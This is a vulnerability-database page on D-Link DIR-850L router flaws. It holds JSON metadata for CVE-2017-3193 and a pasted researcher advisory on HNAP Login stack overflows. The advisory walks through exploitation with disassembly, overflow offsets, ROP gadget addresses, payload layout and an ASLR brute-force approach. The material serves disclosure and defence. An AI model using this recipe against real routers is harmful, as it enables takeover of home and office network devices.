Search criteria
25 vulnerabilities found for dir-850l by dlink
VAR-201712-0130
Vulnerability from variot - Updated: 2024-04-20 23:17Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service. Stack-based buffer overflow (CWE-121) - CVE-2017-3193 Third parties who have access to the product HNAP_AUTH And SOAPAction Crafted header POST Request http://[ Router IP address ]/HNAP1/ To cause a buffer overflow, root It is possible to execute arbitrary code with authority. By default, remote management operations are disabled, and attacks LAN Limited to the side interface.By a third party who has access to the product, root An arbitrary code may be executed with privileges. The D-LinkDIR-850L is a wireless router from D-Link. An attacker could exploit the vulnerability to execute arbitrary code in the context of an affected device, causing a denial of service. Multiple D-Link Routers are prone to a stack-based buffer-overflow vulnerability. Failed exploit attempts will likely cause a denial-of-service condition. D-Link DIR-850L firmware versions 1.14B07, 2.07.B05 are affected; other versions are also affected
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0130",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.07.b05"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "1.14b07"
},
{
"model": "dir-850l 1.14b07",
"scope": null,
"trust": 0.9,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l 2.07.b05",
"scope": null,
"trust": 0.9,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "version 1.14b07"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "version 2.07.b05"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "1.14b07"
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "2.07.b05"
},
{
"model": "dir-850l 2.07b05 h1ke beta1",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l 1.14b07 h2ab beta1",
"scope": "ne",
"trust": 0.3,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"db": "BID",
"id": "96747"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
},
{
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:1.14b07:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:2.07.b05:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sergi Martinez for NCC Group.",
"sources": [
{
"db": "BID",
"id": "96747"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
}
],
"trust": 0.9
},
"cve": "CVE-2017-3193",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Adjacent Network",
"authentication": "None",
"author": "IPA",
"availabilityImpact": "Complete",
"baseScore": 8.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2017-001662",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2017-02627",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "VHN-111396",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "IPA",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2017-001662",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-3193",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "IPA",
"id": "JVNDB-2017-001662",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-02627",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201703-416",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-111396",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"db": "VULHUB",
"id": "VHN-111396"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
},
{
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service. Stack-based buffer overflow (CWE-121) - CVE-2017-3193 Third parties who have access to the product HNAP_AUTH And SOAPAction Crafted header POST Request http://[ Router IP address ]/HNAP1/ To cause a buffer overflow, root It is possible to execute arbitrary code with authority. By default, remote management operations are disabled, and attacks LAN Limited to the side interface.By a third party who has access to the product, root An arbitrary code may be executed with privileges. The D-LinkDIR-850L is a wireless router from D-Link. An attacker could exploit the vulnerability to execute arbitrary code in the context of an affected device, causing a denial of service. Multiple D-Link Routers are prone to a stack-based buffer-overflow vulnerability. Failed exploit attempts will likely cause a denial-of-service condition. \nD-Link DIR-850L firmware versions 1.14B07, 2.07.B05 are affected; other versions are also affected",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-3193"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"db": "BID",
"id": "96747"
},
{
"db": "VULHUB",
"id": "VHN-111396"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-3193",
"trust": 3.4
},
{
"db": "CERT/CC",
"id": "VU#305448",
"trust": 2.8
},
{
"db": "BID",
"id": "96747",
"trust": 2.6
},
{
"db": "JVN",
"id": "JVNVU98628696",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU99822187",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201703-416",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-02627",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-92825",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-111396",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"db": "VULHUB",
"id": "VHN-111396"
},
{
"db": "BID",
"id": "96747"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
},
{
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"id": "VAR-201712-0130",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"db": "VULHUB",
"id": "VHN-111396"
}
],
"trust": 0.06999999999999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02627"
}
]
},
"last_update_date": "2024-04-20T23:17:14.088000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link Technicacl Support - DIR-850L Downloads",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "DIR-850L Firmware Patch Notes (FW1.14.B07)",
"trust": 0.8,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-850l/reva/dir-850l_reva_firmwarepatchnotes_1.14.b07_en.pdf"
},
{
"title": "DIR-850L Firmware Patch Notes (FW2.07.B05)",
"trust": 0.8,
"url": "ftp://ftp2.dlink.com/security_advisements/dir-850l/revb/dir-850l_revb_firmwarepatchnotes_2.07b05_en.pdf"
},
{
"title": "Patches for multiple D-Link product stack buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/90393"
},
{
"title": "D-Link DIR-850L Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67829"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.1
},
{
"problemtype": "CWE-121",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-111396"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "https://www.kb.cert.org/vuls/id/305448"
},
{
"trust": 2.3,
"url": "http://www.securityfocus.com/bid/96747"
},
{
"trust": 1.7,
"url": "https://tools.cisco.com/security/center/viewalert.x?alertid=52967"
},
{
"trust": 1.7,
"url": "https://twitter.com/nccgroupinfosec/status/845269159277723649"
},
{
"trust": 1.7,
"url": "https://www.nccgroup.trust/uk/our-research/d-link-dir-850l-web-admin-interface-vulnerable-to-stack-based-buffer-overflow/?research=technical+advisories"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3193"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu98628696/index.html"
},
{
"trust": 0.8,
"url": "http://jvn.jp/vu/jvnvu99822187/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-3193"
},
{
"trust": 0.3,
"url": "http://www.dlink.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"db": "VULHUB",
"id": "VHN-111396"
},
{
"db": "BID",
"id": "96747"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
},
{
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"db": "VULHUB",
"id": "VHN-111396"
},
{
"db": "BID",
"id": "96747"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
},
{
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"date": "2017-12-16T00:00:00",
"db": "VULHUB",
"id": "VHN-111396"
},
{
"date": "2017-03-08T00:00:00",
"db": "BID",
"id": "96747"
},
{
"date": "2017-03-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"date": "2017-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-416"
},
{
"date": "2017-12-16T02:29:10.417000",
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-03-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-02627"
},
{
"date": "2019-10-09T00:00:00",
"db": "VULHUB",
"id": "VHN-111396"
},
{
"date": "2017-03-16T02:00:00",
"db": "BID",
"id": "96747"
},
{
"date": "2018-03-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-001662"
},
{
"date": "2019-10-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201703-416"
},
{
"date": "2023-11-08T20:19:55.387000",
"db": "NVD",
"id": "CVE-2017-3193"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote or local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001662"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201703-416"
}
],
"trust": 0.6
}
}
VAR-201807-0057
Vulnerability from variot - Updated: 2024-04-20 23:17Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack in some D-Link DIR routers. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha. The following products are affected: DIR-823, DIR-822, DIR-818L(W), DIR-895L, DIR-890L, DIR-885L, DIR-880L, DIR-868L, and DIR-850L. D-Link Systems, Inc. According to the reporter ’s report, HNAP Communication LAN This is done only on the side interface. CWE-121: Stack-based Buffer Overflow https://cwe.mitre.org/data/definitions/121.htmlOf the product LAN A third party who can access the side interface may execute arbitrary code with administrator privileges. An attacker can exploit this issue to execute arbitrary code in the context of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions. D-Link DIR-823, etc. are all wireless router products of D-Link. tl;dr
A stack bof in several Dlink routers, which can be exploited by an unauthenticated attacker in the LAN. There is no patch as Dlink did not respond to CERT's requests. As usual, a Metasploit module is in the queue (see [9] below) and should hopefully be integrated soon.
The interesting thing about this vulnerability is that it affects both ARM and MIPS devices, so exploitation is slightly different for each type.
Link to CERT's advisory: https://www.kb.cert.org/vuls/id/677427
Link to a copy of the advisory pasted below: https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt
Have fun.
Regards, Pedro
Multiple vulnerabilities in Dlink DIR routers HNAP Login function (multiple routers affected) Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security ========================================================================== Disclosure: 07/11/2016 / Last updated: 07/11/2016
Background on the affected products: "Smartphones, laptops, tablets, phones, Smart TVs, game consoles and more a all being connected at the same time. Thatas why we created the new AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to 3.2Gbps, it delivers the necessary ultra-performance to power even the most demanding connected homes, making it the best wireless home router for gaming."
Summary: Dlink routers expose a protocol called HNAP (Home Network Administration Protocol) on the LAN interface. This is a SOAP protocol that allows identification, configuration, and management of network devices. For more information regarding HNAP, see [1] and [2].
Dlink has a long history of vulnerabilities in HNAP. Craig Heffner in particular seems to have found a lot of them (see [3], [4], [5], [6], [7], [8]). The affected function contains two subsequent stack overflows, which can be exploited by an unauthenticated attacker on the LAN. It affects a number of Dlink routers which span the ARM and MIPS architectures. A Metasploit module that exploits this vulnerability for both architectures has been released [9].
A special thanks to CERT/CC and Trent Novelly for help with disclosing this vulnerability to the vendor. Please refer to CERT's advisory for more details [10]. See below for other constraints. Affected versions: The following MIPS devices have been confirmed to be vulnerable: DIR-823 DIR-822 DIR-818L(W)
The following ARM devices have been confirmed to be vulnerable: DIR-895L DIR-890L DIR-885L DIR-880L DIR-868L -> Rev. B and C only
There might be other affected devices which are not listed above.
Vulnerability details and MIPS exploitation
The vulnerable function, parse_xml_value (my name, not a symbol), is called from hnap_main (a symbol in the binary) in /htdocs/cgibin. This function takes 3 arguments: the first is the request object / string, the second is the XML tag name to be parsed inside the request, and the third is a pointer to where the value of that tag should be returned.
The function tries to find the tag name inside the request object and then extracts the tag value, copying it first to a local variable and then to the third argument. This function is called from hnap_main when performing the HNAP Login action to obtain the values of Action, Username, LoginPassword and Catpcha from the SOAP request shown above.
parse_xml_value(char request, char XMLtag, char* tag_value) (...) .text:00412264 xml_tag_value_start = $s2 .text:00412264 xml_tag_value_end = $s1 .text:00412264 C30 addu xml_tag_value_start, $v0, $s0 # s2 now points to $value .text:00412268 C30 la $t9, strstr .text:0041226C C30 move $a1, xml_tag_value_end # needle .text:00412270 C30 jalr $t9 ; strstr .text:00412274 C30 move $a0, xml_tag_value_start # haystack .text:00412278 C30 lw $gp, 0xC30+var_C20($sp) .text:0041227C C30 beqz $v0, loc_4122BC .text:00412280 C30 subu xml_tag_value_end, $v0, xml_tag_value_start # s1 now holds the ptr to value$ .text:00412284 C30 bltz xml_tag_value_end, loc_4122BC .text:00412288 C30 addiu $s0, $sp, 0xC30+xml_tag_var .text:0041228C C30 la $t9, strncpy .text:00412290 C30 move $a2, xml_tag_value_end # n .text:00412294 C30 move $a1, xml_tag_value_start # src .text:00412298 C30 addu xml_tag_value_end, $s0, xml_tag_value_end .text:0041229C C30 jalr $t9 ; strncpy # copies all chars in $value$ to xml_tag_var using strncpy .text:004122A0 C30 move $a0, $s0 # dest .text:004122A4 C30 move $a0, a2_ptr # a2_ptr is a stack variable from hnap_main (passed as third argument to parse_xml_value) .text:004122A8 C30 lw $gp, 0xC30+var_C20($sp) .text:004122AC C30 move $a1, $s0 # src .text:004122B0 C30 la $t9, strcpy # copies xml_tag_var into a2_ptr using strcpy .text:004122B4 C30 jalr $t9 ; strcpy # the stack of the calling function (hnap_main) is thrashed if 2408+ bytes are sent .text:004122B8 C30 sb $zero, 0(xml_tag_value_end) (...)
There are two overflows, therefore two choices for exploitation: 1) The local stack (on parse_xml_value) can be overrun with 3096+ bytes. This overflow occurs even though strncpy is used, because the argument to strncpy is simply the strlen of the value inside the XML tag. 2) Alternatively, it's possible to overrun the stack of the calling function (hnap_main), using only 2408+ bytes - this is because strcpy is used to copy the xml_tag_var onto the third argument received by parse_xml_value, which is a pointer to a stack variable in hnap_main.
Exploiting 1) is easier, and the following example will explain how.
All the affected MIPS devices use the same version of uClibc (libuClibc-0.9.30.3.so) and seem to load it at 0x2aabe000, which makes exploitation trivial for all firmware versions. It should be noted that the MIPS devices use the RTL8881a CPU, which is based on a Lextra RLX5281 core. The Lextra RLX cores are MIPS clones, but they're bit crippled as they are lacking a few load and store instructions. For this reason, some generic shellcodes that work on MIPS might not work on these CPUs (especially when obfuscated).
The devices also do not have NX, ASLR nor any other modern memory protections, so the shellcode is executed directly on the stack. However, it's necessary to use ROP to prepare the stack for execution, which can be executed with gadgets taken from libuClibc-0.9.30.3.so. Due to the way MIPS CPUs work, it's necessary to flush the CPU cache before executing the exploit. This can be forced by calling sleep() from libc (refer to http://blog.emaze.net/2011/10/exploiting-mips-embedded-devices.html for an explanation on the MIPS CPU caches).
So the ROP chain and shellcode will look like:
first_gadget - execute sleep and call second_gadget .text:0004EA1C move $t9, $s0 <- sleep() .text:0004EA20 lw $ra, 0x20+var_4($sp) <- second_gadget .text:0004EA24 li $a0, 2 <- arg for sleep() .text:0004EA28 lw $s0, 0x20+var_8($sp) .text:0004EA2C li $a1, 1 .text:0004EA30 move $a2, $zero .text:0004EA34 jr $t9 .text:0004EA38 addiu $sp, 0x20
second_gadget - puts stack pointer in a1: .text:0002468C addiu $s1, $sp, 0x58 .text:00024690 li $s0, 0x44 .text:00024694 move $a2, $s0 .text:00024698 move $a1, $s1 .text:0002469C move $t9, $s4 .text:000246A0 jalr $t9 .text:000246A4 move $a0, $s2
third_gadget - call $a1 (which now has the stack pointer): .text:00041F3C move $t9, $a1 .text:00041F40 move $a1, $a2 .text:00041F44 addiu $a0, 8 .text:00041F48 jr $t9 .text:00041F4C nop
When the crash occurs, the stack pointer is at xml_tag_value[3128]. In order to have a larger space for the shellcode (3000+ bytes), it's possible to jump back to xml_tag_value[0]. prep_shellcode_1 = 23bdf3c8 # addi sp,sp,-3128 prep_shellcode_2 = 03a0f809 # jalr sp branch_delay = 2084f830 # addi a0,a0,-2000 (NOP executed as a MIPS branch delay slot)
The final Action / Username / LoginPassword / Catpcha XML parameter value will be: shellcode + 'a' * (3072 - shellcode.size) + sleep() + '1' * 4 + '2' * 4 + '3' * 4 + third_gadget + first_gadget + 'b' * 0x1c + second_gadget + 'c' * 0x58 + prep_shellcode_1 + prep_shellcode_2 + branch_delay
'a', 'b' and 'c' are just fillers to make up the buffer, while '1111', '2222' and '3333' will be the values of s1, s2 and s3 registers (which are not interesting for exploitation), and the rest is the ROP chain, shellcode and stack preparation routine. The only bad character that cannot be sent in the payload is the null byte as this is a str(n)cpy overflow. Up to 3350 characters can be sent, as after that it's hard to control the overflow in a reliable way. Note that all of this is to exploit the first buffer overflow with strncpy, but the second buffer overflow can be exploited in a similar way.
As explained above, due to the use of a crippled MIPS core, generic shellcodes found on the Internet will likely fail. Some very simple ones work, but the best is to craft a reliable one. The simple Metasploit bind shell also seems to work pretty reliably if no encoder is used.
ARM exploitation
The same two stack overflows affect ARM, but require less bytes to overflow the stack. The following snippet is the same part of parse_xml_value as shown for MIPS (taken from firmware 2.03b01 for the DIR-868 Rev. B): .text:00018F34 C30 LDR R1, [R11,#src] ; src .text:00018F38 C30 LDR R2, [R11,#n] ; n .text:00018F3C C30 SUB R3, R11, #-xml_tag_var .text:00018F40 C30 SUB R3, R3, #4 .text:00018F44 C30 SUB R3, R3, #4 .text:00018F48 C30 MOV R0, R3 ; dest .text:00018F4C C30 BL strncpy ; first overflow occurs here (xml_tag_var in parse_xml_stack) with 1024+ characters .text:00018F50 C30 MOV R3, #0xFFFFFBEC .text:00018F58 C30 LDR R2, [R11,#n] .text:00018F5C C30 SUB R1, R11, #-var_4 .text:00018F60 C30 ADD R2, R1, R2 .text:00018F64 C30 ADD R3, R2, R3 .text:00018F68 C30 MOV R2, #0 .text:00018F6C C30 STRB R2, [R3] .text:00018F70 C30 SUB R3, R11, #-xml_tag_var .text:00018F74 C30 SUB R3, R3, #4 .text:00018F78 C30 SUB R3, R3, #4 .text:00018F7C C30 LDR R0, [R11,#a2_ptr] ; a2_ptr is is a stack variable from hnap_main .text:00018F80 C30 MOV R1, R3 ; src .text:00018F84 C30 BL strcpy ; second overflow occurs here
The stack size will be smaller for both parse_xml_value and hnap_main when compared to the MIPS binary. This time again it's easier to exploit the easier strncpy overflow in parse_xml_value, but only 1024 bytes are enough to overflow the stack. As with the MIPS exploit, the only bad character is the null byte.
The affected ARM devices have a non-executable stack (NX) and 32 bit ASLR. NX can be defeated with ROP, and the 32 bit ASLR is weak - there are only 3 bytes that change in the address calculations, which means there are only 4096 possible values. The attack has to be run several times until the correct base address is hit, but this can usually be achieved in less than 1000 attempts.
